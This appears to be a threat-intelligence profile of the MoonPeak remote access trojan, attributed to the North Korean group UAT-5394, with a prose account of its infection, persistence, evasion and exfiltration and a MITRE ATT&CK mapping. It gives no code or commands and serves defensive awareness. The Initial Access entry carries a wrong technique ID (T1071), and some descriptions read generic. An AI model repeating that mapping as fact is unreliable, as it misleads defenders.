MoonPeak (Trojan) – Malware

Overview

MoonPeak is a sophisticated piece of malware developed by a North Korean cyber threat actor group, tracked by Cisco Talos as UAT-5394. This malware, a variant of the open-source XenoRAT remote access trojan (RAT), has undergone significant evolution since its inception. The group has actively modified and developed MoonPeak as part of a broader, state-sponsored cyber espionage campaign. Cisco Talos’ recent analysis of the malware’s infrastructure has revealed a detailed look at the group’s evolving tactics, techniques, and procedures (TTPs), offering new insights into the inner workings of this malicious tool. MoonPeak serves as a potent tool for remote access, enabling attackers to control compromised systems, harvest sensitive data, and maintain long-term surveillance over their targets.

The deployment of MoonPeak is not just a reflection of the group’s evolving technical capabilities, but also a shift in how they manage their infrastructure. Talos’ findings show that UAT-5394 has moved away from relying on legitimate cloud services for hosting malicious payloads, instead opting to establish their own server infrastructure. This transition underscores a strategic effort to maintain control over their operations and avoid the potential disruption from third-party cloud providers. The malware has been actively tested across various C2 (command and control) servers, which have been used to refine and distribute different iterations of MoonPeak. The group’s ability to modify and pivot across different servers while keeping their activities under the radar highlights their growing sophistication and adaptability in the face of cybersecurity efforts to track them.

Targets

Information

Public Administration

Individuals

How they operate

Initial Infection and Execution

MoonPeak typically enters a target network through spear-phishing emails or malicious attachments. These emails are carefully crafted to appear legitimate, often mimicking trusted sources or using social engineering to entice victims into opening attachments or clicking on links. Once the victim interacts with the malicious content, the malware is delivered onto the system. Upon execution, the malware payload is often disguised within benign files or encoded to avoid detection by traditional security tools. The first stage of its operation involves establishing a foothold within the victim’s system, typically by leveraging PowerShell scripts or batch files to silently execute the payload.

Upon successful execution, the malware uses a variety of techniques to establish persistence within the compromised system. MoonPeak often makes modifications to system files, registry entries, or startup folders to ensure it remains active even after a system reboot. This persistence mechanism is critical as it ensures that the malware can continue operating in the background without being interrupted, enabling attackers to maintain control over the victim’s system for long periods.

Privilege Escalation and Lateral Movement

Once MoonPeak is running on the victim’s system, it often attempts to escalate its privileges to gain higher levels of access. Privilege escalation techniques, such as exploiting known vulnerabilities or leveraging misconfigurations in the system, are common in this stage. By obtaining administrator or root-level privileges, MoonPeak can access restricted files, execute higher-level commands, and control critical system resources. This elevation is vital for the malware to expand its impact and increase its ability to infiltrate deeper into the network.

With elevated privileges, MoonPeak can then move laterally within the compromised network. Using legitimate network protocols like RDP (Remote Desktop Protocol) or SMB (Server Message Block), the malware can infect additional machines connected to the same network. Lateral movement is a crucial tactic for malware designed to target enterprise environments, where it can compromise additional systems, access valuable data, and escalate the attack’s impact.

Data Collection and Exfiltration

As MoonPeak continues its operations, it collects sensitive data from the victim’s system. This can include login credentials, personally identifiable information (PII), financial data, or intellectual property, which is often the primary objective of the attack. The malware may use keystroke logging, screenshot capturing, and clipboard monitoring to gather relevant information. Additionally, MoonPeak can scan the victim’s system for specific files or directories containing critical data, further enhancing its ability to gather valuable intelligence.

The malware exfiltrates this data by establishing a secure Command and Control (C2) channel with remote servers controlled by the attackers. Using encrypted communication, MoonPeak uploads the stolen data in chunks, minimizing the risk of detection by network monitoring tools. In some cases, MoonPeak may utilize legitimate cloud services or file-sharing platforms to obscure its data exfiltration activities, making it harder for security defenses to track the stolen data.

Evasion and Defense Mechanisms

Throughout its lifecycle, MoonPeak employs a variety of evasion techniques to avoid detection by security tools. One of the primary methods of evasion is the use of fileless malware techniques. By running in memory and utilizing legitimate system tools like PowerShell or WMI (Windows Management Instrumentation), the malware can execute commands without creating persistent files that would otherwise be flagged by antivirus software. Additionally, MoonPeak may disguise its network traffic using encrypted protocols to hide its communications from traditional detection methods.

The malware can also employ anti-analysis measures such as detecting sandbox environments, delaying its execution until it confirms that it’s running in a real system, or using code obfuscation to make reverse engineering more difficult. These strategies are designed to thwart both automated and manual detection efforts, allowing MoonPeak to remain undetected for extended periods.

MITRE Tactics and Techniques

Initial Access (T1071) – MoonPeak uses spear-phishing emails with malicious attachments or links to gain access to victim systems. This allows the attackers to deliver the malware and gain footholds in targeted networks.

Execution (T1059) – Once MoonPeak gains access, it executes commands to run malicious code on the victim’s system. This may involve the use of scripts, remote access tools, or other mechanisms to execute payloads and further the infection.

Persistence (T1547) – MoonPeak ensures it remains active on compromised systems by establishing persistence. This can involve modifying startup files or leveraging other techniques to ensure the malware continues to run even after a reboot.

Privilege Escalation (T1068) – MoonPeak may attempt to escalate its privileges on the target system to gain higher-level access, allowing the malware to carry out more impactful actions or gain access to restricted areas of the network.

Defense Evasion (T1070) – The malware utilizes techniques such as file deletion, registry modification, or rootkit-like functionality to evade detection by security software or manual monitoring. It may also disguise itself using obfuscation or encryption techniques.

Credential Dumping (T1003) – MoonPeak is capable of extracting and harvesting credentials stored on compromised systems, enabling further lateral movement or access to other systems within the target environment.

Discovery (T1083) – The malware conducts reconnaissance within the compromised environment to identify key systems, services, and users. This enables the attackers to determine the scope of the network and identify valuable targets for data exfiltration or further exploitation.

Lateral Movement (T1021) – Once the malware has gained a foothold, it may use techniques such as Remote Desktop Protocol (RDP) or other network protocols to move laterally within the network, compromising additional systems and expanding its reach.

Collection (T1119) – MoonPeak is designed to collect sensitive information from the compromised system, including credentials, files, and other forms of data that may be valuable to the attackers.

Exfiltration (T1041) – The malware is capable of exfiltrating collected data from the compromised system to an external server controlled by the attackers. This data is typically stolen for espionage or other malicious purposes.

Command and Control (T1071) – MoonPeak establishes a command and control (C2) communication channel with remote servers to receive instructions, upload stolen data, and update its functionality. This is a critical component of the malware’s persistence and ability to execute further actions.

References:

• MoonPeak malware from North Korean actors unveils new details on attacker infrastructure